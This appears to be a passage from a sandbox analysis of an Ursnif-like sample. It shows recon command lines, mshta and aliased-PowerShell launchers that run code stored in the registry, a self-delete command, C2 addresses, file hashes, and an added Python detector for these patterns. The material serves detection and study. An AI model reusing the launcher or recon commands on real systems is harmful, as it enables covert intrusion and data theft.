cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\48C0.bin1 > C:\Users\Admin\AppData\Local\Temp\48C0.bin & del C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
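The launcher and collection chain listed above is regular enough to be pulled out of process-creation telemetry mechanically: mshta reads a JScript stage from HKCU\Software\AppDataLow\Software\Microsoft\<GUID>\PlayStop, the aliased PowerShell stage reads StopLocal from the same key, the dropper removes itself with ping localhost -n 5 && del, the external IP is looked up through resolver1.opendns.com, and a fixed series of cmd /C "<tool> >> %TEMP%\48C0.bin1" commands builds the system profile that is later exfiltrated. The Python below is an added example written for this page, not tooling from the sandbox vendor. It only understands command lines in the exact shapes shown above; the regular expressions, the constructed SAMPLE_CMDLINES list (copied from the Processes list plus one benign RuntimeBroker line) and the three-of-four verdict threshold are this example's own assumptions.

```python
import re
from collections import OrderedDict

# Constructed sample: command lines copied from the behavioral2 Processes list
# above, plus a benign RuntimeBroker line that the filters must ignore.
SAMPLE_CMDLINES = [
    r'''C:\Windows\System32\RuntimeBroker.exe -Embedding''',
    r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dsq4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsq4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rnxokhs -value gp; new-alias -name ciaisbj -value iex; ciaisbj ([System.Text.Encoding]::ASCII.GetString((rnxokhs "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))''',
    r'''"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"''',
    r'''cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\96B8.bi1"''',
    r'''cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\96B8.bi1"''',
    r'''cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\48C0.bin1"''',
    r'''"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,''',
    r'''cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"''',
    r'''cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"''',
    r'''cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"''',
    r'''cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"''',
    r'''cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"''',
    r'''cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\48C0.bin1 > C:\Users\Admin\AppData\Local\Temp\48C0.bin & del C:\Users\Admin\AppData\Local\Temp\48C0.bin1"''',
]

REGREAD_RE = re.compile(r"regread\('([^']+)'\)", re.I)          # JScript launcher in mshta
ALIAS_RE = re.compile(r"new-alias\s+-name\s+(\w+)\s+-value\s+([^\s;]+)", re.I)
GP_RE = re.compile(r'\((\w+)\s+"(HK\w+:[^"]+)"\)\.(\w+)')          # (<alias> "HKCU:...").<value>
REDIRECT_RE = re.compile(r'^cmd(?:\.exe)?\s+/C\s+"(.+?)\s+>>?\s+(\S+)"$', re.I)
SELF_DEL_RE = re.compile(r'ping\s+(?:localhost|127\.0\.0\.1)\s+-n\s+\d+\s*&&\s*del\s+"?([^"]+)"?', re.I)


def registry_stage_locations(cmdlines):
    """(key, value name) pairs that the launcher chain reads its next stage from.
    Handles the mshta regread() form and the PowerShell Get-ItemProperty form,
    resolving new-alias renames so 'rnxokhs' is recognised as 'gp'."""
    found = []
    for c in cmdlines:
        for m in REGREAD_RE.finditer(c):
            # JScript string escaping leaves runs of 2-3 backslashes; collapse to one.
            key, _, value = re.sub(r"\\+", r"\\", m[1]).rpartition("\\")
            found.append((key, value))
        aliases = {a.lower(): v.lower() for a, v in ALIAS_RE.findall(c)}
        for alias, key, value in GP_RE.findall(c):
            if aliases.get(alias.lower(), alias.lower()) in ("gp", "get-itemproperty"):
                hive, _, sub = key.partition(":")        # HKCU:Software\... -> HKCU\Software\...
                found.append((hive + "\\" + sub, value))
    return found


def recon_collection(cmdlines):
    """Group cmd /C "<tool> ... >> <file>" invocations by output file, in order,
    dropping the 'echo --------' separators written between sections."""
    by_file = OrderedDict()
    for c in cmdlines:
        m = REDIRECT_RE.match(c.strip())
        if m and not m[1].lower().startswith("echo "):
            by_file.setdefault(m[2], []).append(m[1])
    return by_file


def ursnif_indicators(cmdlines):
    """Summarise the four behaviours above; 'ursnif-like' needs at least three."""
    stages = registry_stage_locations(cmdlines)
    recon = recon_collection(cmdlines)
    self_delete = [m[1] for m in map(SELF_DEL_RE.search, cmdlines) if m]
    ext_ip = any(re.search(r"nslookup\s+myip\.opendns\.com", c, re.I) for c in cmdlines)
    hits = sum(bool(x) for x in (stages, recon, self_delete, ext_ip))
    return {
        "registry_stages": stages,
        "recon": recon,
        "self_delete": self_delete,
        "external_ip_lookup": ext_ip,
        "verdict": "ursnif-like" if hits >= 3 else "inconclusive",
    }


if __name__ == "__main__":
    for name, value in ursnif_indicators(SAMPLE_CMDLINES).items():
        print(name, "=", value)
```

The registry locations are the part worth keeping from an infected host: the PlayStop and StopLocal values under that GUID key hold the JScript and PowerShell stages, and the PowerShell stage decodes StopLocal with ASCII.GetString, so the value is stored as raw bytes rather than a string. Resolving new-alias first matters because a rule that only looks for the literal gp or iex cmdlet names would miss this sample entirely.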

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
NL 146.70.35.138:80 146.70.35.138 tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
BE 193.56.146.148:80 193.56.146.148 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
CA 67.43.234.14:80 67.43.234.14 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/1648-130-0x0000000000400000-0x000000000040D000-memory.dmp

memory/1648-132-0x0000000000400000-0x000000000040D000-memory.dmp

memory/1464-134-0x000001CE6D500000-0x000001CE6D522000-memory.dmp

memory/1464-136-0x000001CE6D570000-0x000001CE6D572000-memory.dmp

memory/1464-135-0x00007FFE88800000-0x00007FFE892C1000-memory.dmp

memory/1464-137-0x000001CE6D573000-0x000001CE6D575000-memory.dmp

memory/1464-138-0x000001CE6D576000-0x000001CE6D578000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.cmdline

MD5 5a979e67dddaa99228c7175293fc1eae
SHA1 bc74ded8feb8d35b9187fb042ec86f070def5be2
SHA256 0ee7f42a19daf9bd351b13e131a687d01d6eb3ef2d36f9b1989a791e04ba6635
SHA512 93d8ae2812a6381f948f60942e16c0a4dc79f81bda30542e766deedea0609c0ff1e8f088a513347523f6149fa3822165bec7ca6f1cf183f57795e954d6617cf9

\??\c:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.0.cs

MD5 0b7537cf8128ca1320d7bf219bb65b46
SHA1 33ca68f06067df84baa078137f1285102d30cb3a
SHA256 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8
SHA512 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276

\??\c:\Users\Admin\AppData\Local\Temp\f52evw42\CSC7C797FB70504A3AADFE5CB713FF399D.TMP

MD5 5a356841cee3723ea31b767cb4df7bcc
SHA1 7531ab1c49cd47fca70424f3ca8e207365e2f813
SHA256 df83ae873b7d994f5d15f4e6eda272852c8bff60fc0afda81b7d7aede28ae4cc
SHA512 f3b81f9782461034224046381cfb234c63f3747ae818cfbe27154fc413d0eb5f009fc7f317ca548c9b0aa93d636ccfb7eae27464c9fc16a3258fede972488bce

C:\Users\Admin\AppData\Local\Temp\RESC0DC.tmp

MD5 827e7339672df98a60290e862c30aa5d
SHA1 d609786846b2da9f51b09e4c8fa532fe869f5fa0
SHA256 d79ae6f85d7f7fc698882975a085de0998ebf40da70fbe2c15e87e18754173f2
SHA512 8e7320fcc4692418aaaa11a3347a03f10eb7dc74c5be111c7cdcfe1d8e89f3bdf89b7360e43394a9ee3abc386556f2d9d915a15402ee06ff8e735c86948ce9ba

C:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.dll

MD5 159b61ffa605f136dce2773789107eb3
SHA1 e91f4e9cba4232633048fca9285ac9fb2e1b9b7d
SHA256 2e1c7b393bd4f8ad6e51535fad23dbb7961cef20924629f74a1a9e9228968ebd
SHA512 b8d5db1ec4e9b80b7de2b6d22d307eb2ffd94cd7bc5558d87b44d94e38c28d5fe26e6881b87f796e0618330db0163231ef341df6bbd47f0b49af5f166c1a15ac

\??\c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.cmdline

MD5 e2ca7846ac32d4f3137380e1abd25e6d
SHA1 4de339ef464c08ba3abaf942ccd21a1b46becc8b
SHA256 73356f23bd5c3be9ebda888db18551004c8491e16ccd8c61ddfa441d56872b5c
SHA512 b80859cda2f6115d9e5f48b18b324f9560d99f75d47431beaf4ae8dd86289e2a6cf26fdb0af0c9d93e8898158e8a231bb9be43f384f5476fe1ec22f9a3b5b84a

\??\c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.0.cs

MD5 35b3f48ba529849ae98e5f2c89b802f6
SHA1 e6ac7f0dff73e320ab7c09f5abb45dede87cfe81
SHA256 f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61
SHA512 b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153

\??\c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\CSCF687E3C2E95F45A4B0A5E441CCFA80AC.TMP

MD5 4433fa325327c3dc432b004316445d2c
SHA1 34ed95bd7ee384565565b556e2e30af03d5c1e2b
SHA256 55c13880c05d6e659f1380afbcbe6786225069d13984692546165a70e24dd8c2
SHA512 b4d3c993acb6157688bef173ecd0fa5fd6f3615e994e442b3accce491a48012c55f2c81412a70d2e5b68e726f2693b22f1ec5a38994780e28cf6af0db2b6223c

C:\Users\Admin\AppData\Local\Temp\RESC1B7.tmp

MD5 4286e43bfeb1e3387ac41f2b7b2db13c
SHA1 488fe590c37256f2e4b2c89c0eef4aa9274e7454
SHA256 8a985360ae68a55e0e01021d3c19bee9854580a43a2ccd85d1698fc620d9828f
SHA512 10869dc8ebd47ed28572169bbb2145db24e9b466829078172d9a3cdf944bb9a92229750bb05d7fa122b86d9196946ed6beb673daa8ad9dec3db6e03e6f04d651

C:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.dll

MD5 a42b7d75a369b2595356d134e95cd50d
SHA1 3fc915c11d99e3d2facc9bca395b6988af9183fd
SHA256 282bfcafe282fd7a0f6f0b1860024a2b3dca84e4ae2d88e59ae97649d9341642
SHA512 c05e85f4765a91cf04bc0a2cdceb772086ecb734848ca63bae6e744b91db61b7e1a5b568e81c02a43d91c780b565c65460ad435691dd20f62a9dfccf43be4a56

memory/1464-149-0x000001CE6D980000-0x000001CE6D9C4000-memory.dmp

memory/3428-150-0x0000022B56A00000-0x0000022B56A01000-memory.dmp

memory/3440-152-0x00000192B8590000-0x00000192B8591000-memory.dmp

memory/3944-151-0x0000016A15840000-0x0000016A15841000-memory.dmp

memory/3032-153-0x0000000002140000-0x0000000002141000-memory.dmp

memory/3032-154-0x00000000080B0000-0x0000000008168000-memory.dmp

memory/3428-155-0x0000022B56940000-0x0000022B569F8000-memory.dmp

memory/5092-156-0x000001F1BFA30000-0x000001F1BFA31000-memory.dmp

memory/5092-157-0x000001F1BFC60000-0x000001F1BFD18000-memory.dmp

memory/3752-158-0x00000204B1050000-0x00000204B1051000-memory.dmp

memory/3752-159-0x00000204B1960000-0x00000204B1A18000-memory.dmp

memory/3944-160-0x0000016A15C10000-0x0000016A15CC8000-memory.dmp

memory/3440-161-0x00000192B84D0000-0x00000192B8588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\96B8.bi1

MD5 6d779dd3915807d04f282a0d3a7fd7de
SHA1 4f8fc87e30faef4d9e444a545c6987f2ea4598c2
SHA256 dd8033fe667b54228ca97bab4e63499611f91930b95594568795710e1aa6eaf4
SHA512 d7caf47acdbd7ec12790f38360fc5758b48d8ca934c10c8e7596e5820743bc738ce90fc20e3140486769c149012af1c5a1d7bcdc18ba4c58c93a400515822d5f

C:\Users\Admin\AppData\Local\Temp\96B8.bi1

MD5 4f6429322fdfd711b81d8824b25fcd9c
SHA1 f7f917b64dd43b620bacd21f134d430d3c406aec
SHA256 d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8
SHA512 e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

memory/1036-164-0x0000000000B26B20-0x0000000000B26B24-memory.dmp

memory/1036-165-0x00000000015A0000-0x000000000164A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 056a1cd8b8b3c1cc08f23231deb47221
SHA1 a563acec40cfa68f6764ca8b6aa1f162782557e1
SHA256 eef075b7a0e45f8aca922f6b0487e12be521b26ae0f0f200a66d314324bfb90c
SHA512 2b535313e0476adf064ad83d2d2709d1c6d31541dc7f5853c45706e20b98a055a9bb630b3bfaae067cafcffee4df6c60dc15295a39e55d0ab8fb86bc288fa05f

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 b9727bcf2c72cceb65496771d2d1a6c0
SHA1 95fb969271b18eb6c8c2917bb9422b935e1fa3b7
SHA256 f703364321f81c265142f3f412ae828673f3db7b36e56666962839d8637d79ab
SHA512 635ff7defa6489251f69ebd45fed5a643920f7c18c184f245be8ed9fcf9bb27b6199d8601c18168346054e988e248d69a9106a73117b3bce99e6ad040fc3c305

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 ccc503e7bfb38450212ab6a4bcf279dc
SHA1 8300651778c9d5f6b1a44d7b44ea6fc0ba630edf
SHA256 4e8933d6986e714f1118353c5e7ef01110ec56e9521a0e3416dc2187579dd45d
SHA512 62ea2b8ab8d0a37b8041be0a4688ef933d09b51b8ed21174ec01e6590e35bb787d945d438d40b37fabff44c264bdb925c38aef85bb0f574ee7c59ba5fcef2809

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 b2488b038724f031e9945889c17afee7
SHA1 9c590e69c29857eedd58fcb5f87e0a09c0590247
SHA256 c268586327e0ab2d12a746b3001d6110a6debc000e00db40e67bb946259d9ddd
SHA512 520be151b8b38d42d3ff208a7b6fdb52461de2642a1ae14e88bc9928d184f25c6e0c73b1808ef47659947178a38caaebc2b109ed0dcaf7b3086cba3248306c9f

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 ccbc197899cdb2da19f7fe035991d89e
SHA1 49b851de7b0c76228f5afaff948e0039d0468e3d
SHA256 3c8ec7aaeba6d713198b16c594ba1381afc5d2ac225fc9e1fa387c926756b7d3
SHA512 50c4d2a61dbb3234cb23390946bea58c6a4eb00524a2e3932ae833863f69c7c0ade1567b613b51d789a29526377731b620f11233df5f2873529983d6deff1839

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 9f459ec790939dcececef320242f86c9
SHA1 54e8cb4f8e71189da3f60fd0f45757ece40da4f0
SHA256 181ec9198305b37f7ee8f5eb34bb55df75a54f2d868dacba5d69ac508c0a9e26
SHA512 35cf94e4dafadbcd8ecbe3a08c2eb13efb2a02b946128bab9f97e3761375af9ca9d85c2190cb3d474e3ef9cb08980a153d68a2f2babf5a6ad7ef49a3aae989ea

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 27f8c58919524bc9bd491400374e73b4
SHA1 cca40b46967292a933285855619cc13fc97d122d
SHA256 98ff40e307147a5c8d785eeaa016c09eab30eeb4a46722dcff9a194c85e1bae0
SHA512 2a2c8c9fc080b0284cf1ae42006e9af646cb2a1dab175bf275434773d51df6e8a03122d2ea72624c7fcc19a374da5561dd28c5d176a2dfc8bbc28d7c46486666

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 2ea63d3c29f2a9a4c9c8e79c24d69e8d
SHA1 38f20562e0484df0a5a379338f7f4f73b2838634
SHA256 3d1f92172ed2762b165300102cd7a84d68f0e7825faf743a1ea092550025a423
SHA512 27182495b91173d90f40ac47c69e1019ce9f89059d6ab14b4ae7f22ce6c7ab6a38196f486b6e09dd7ad638ee2219276196f87eac5785e5aa53dd87c297055dbf

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 e7d5805f82ad7a47b16c0d19f535589e
SHA1 c219d20e95d33c461c407cf315b0392acb76fc96
SHA256 ec287b7bd01b78d2f139b9fcc787e6a8e2aa18eb43b109ff4e337d6f5bcef9f0
SHA512 38e17a3b2b83c228e1dcd027e49eb2f363ab5101dab08a63d557917b28cf60c4e74af03a417d37b8dcafbf08a6a8c7cbaa6bd095719fd6bb0b79d5c077cd280e

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 a12e71d1828ea78028bd6a67d7da792c
SHA1 36677f7b79c86c037dc826e06999a652da0a54d4
SHA256 f9211513376e665dea5eeda809094bb8a0480813811c92ace545285f2c7c4d04
SHA512 23026a25e4060a32d5c9c0915521f29b37876f2251670e0d9c4521f772924959b8f79cb209e20f4e78f236644df5e851d275ff60e5f2376e7bc31f5e0a6b0e56

C:\Users\Admin\AppData\Local\Temp\48C0.bin1

MD5 ba6bc0b0b363e85d5aeee5700fc92ff3
SHA1 fe5664d761e295d59305e9036eeaf9dde55356d7
SHA256 aef371567a0105b20403a327a6131f3a7fc46111b022f9f13ba85daf3e843cd9
SHA512 c44ace72b621a793d1ed1c3de6c1a53dd13d1e38eb0b1e62acbda2f01d375bc4af1637c67a72041bcc357bb1610f97adf15014fbff9ee878ba8bbdaac8eea49e

C:\Users\Admin\AppData\Local\Temp\48C0.bin

MD5 ba6bc0b0b363e85d5aeee5700fc92ff3
SHA1 fe5664d761e295d59305e9036eeaf9dde55356d7
SHA256 aef371567a0105b20403a327a6131f3a7fc46111b022f9f13ba85daf3e843cd9
SHA512 c44ace72b621a793d1ed1c3de6c1a53dd13d1e38eb0b1e62acbda2f01d375bc4af1637c67a72041bcc357bb1610f97adf15014fbff9ee878ba8bbdaac8eea49e